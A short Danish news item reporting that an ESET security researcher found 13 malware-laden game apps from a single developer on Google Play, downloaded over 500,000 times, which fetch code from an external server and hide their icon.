Applikationen henter, ifølge sikkerhedsmanden, ondsindet kode fra en ekstern server og installerer malware på enheden, samtidig med at app-ikonet bliver slettet.

Sprog
Dansk

Læs mere om Sikkerhedsmand: 500.000 brugere har hentet spil-app med malware

Mere end 500.000 brugere har ifølge sikkerhedsforsker Lukas Stefanko, der er ansat hos antivirus-producenten ESET, hentet malware-inficerede apps til Android fra Googles egen app-butik, Google Play.

Det drejer sig om 13 forskellige spil, der er skabt af den samme udvikler, som til sammen er downloadet de mange gange.

Applikationen henter, ifølge sikkerhedsmanden, ondsindet kode fra en ekstern server og installerer malware på enheden, samtidig med at app-ikonet bliver slettet.

Sprog
Dansk

Keywords: mobilmobiltelefonGoogleAndroidLæs mere om Sikkerhedsmand: 500.000 brugere har hentet spil-app med malware